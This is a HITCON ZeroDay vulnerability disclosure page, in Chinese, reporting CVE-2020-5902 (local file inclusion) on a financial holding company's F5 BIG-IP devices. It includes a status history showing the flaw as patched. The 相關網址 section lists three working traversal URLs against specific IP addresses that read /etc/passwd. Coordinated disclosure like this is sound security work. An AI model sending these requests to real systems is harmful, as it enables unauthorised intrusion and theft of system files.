永豐金融控股股份有限公司F5 Networks BIG-IP產品存有CVE-2020-5902等漏洞 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2020-00608
  •  發信 Vendor: 永豐金融控股股份有限公司
  • Title: 永豐金融控股股份有限公司F5 Networks BIG-IP產品存有CVE-2020-5902等漏洞
  • Introduction: Local File Include

處理狀態

目前狀態

公開
Last Update : 2020/07/29
  • 新提交
  • 已審核
  • 已通報
  • 已修補
  • 未複測
  • 公開

處理歷程

  • 2020/07/07 15:47:21 : 新提交 (由 phantom 更新此狀態)
  • 2020/07/07 17:15:25 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/07/08 16:23:31 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/07/08 16:23:31 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/07/08 16:23:31 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/07/21 14:13:12 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/07/29 03:00:07 : 公開 (由 HITCON ZeroDay 平台自動更新)
  • 2020/07/29 17:02:59 : 公開 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/07/29 17:03:21 : 暫停 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/07/29 21:54:16 : 暫停 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/07/29 21:55:19 : 公開 (由 HITCON ZeroDay 服務團隊 更新此狀態)

詳細資料

  • ZDID:ZD-2020-00608
  • 通報者:phantom (phantom)
  • 風險:嚴重
  • 類型:本地檔案引入 (Local File Inclusion, LFI)

參考資料

攻擊者可經由該漏洞取得後端系統檔案及網站程式原始碼等敏感資料。

漏洞說明: OWASP - Testing for Local File Inclusion
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion

Wikepedia 漏洞說明:
https://en.wikipedia.org/wiki/File_inclusion_vulnerability

OWASP Top 10 2007 - Malicious File Execution
https://www.owasp.org/index.php/Top_10_2007-Malicious_File_Execution
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://211.76.150.211:443/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://211.76.150.212:443/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
https://211.76.150.213:443/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

敘述

永豐金融控股股份有限公司F5 Networks BIG-IP TMUI存在CVE-2020-5902等漏洞,Cvss v3風險評分為重大(10分),可能讓不具授權的遠端攻擊者執行指令,並取得系統完整控制權,包括攔截流經該設備的應用流量,為避免遭駭客竊取相關機敏資訊,建議該單位的資訊人員,立即修補漏洞並將設備更新至最新版本。

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;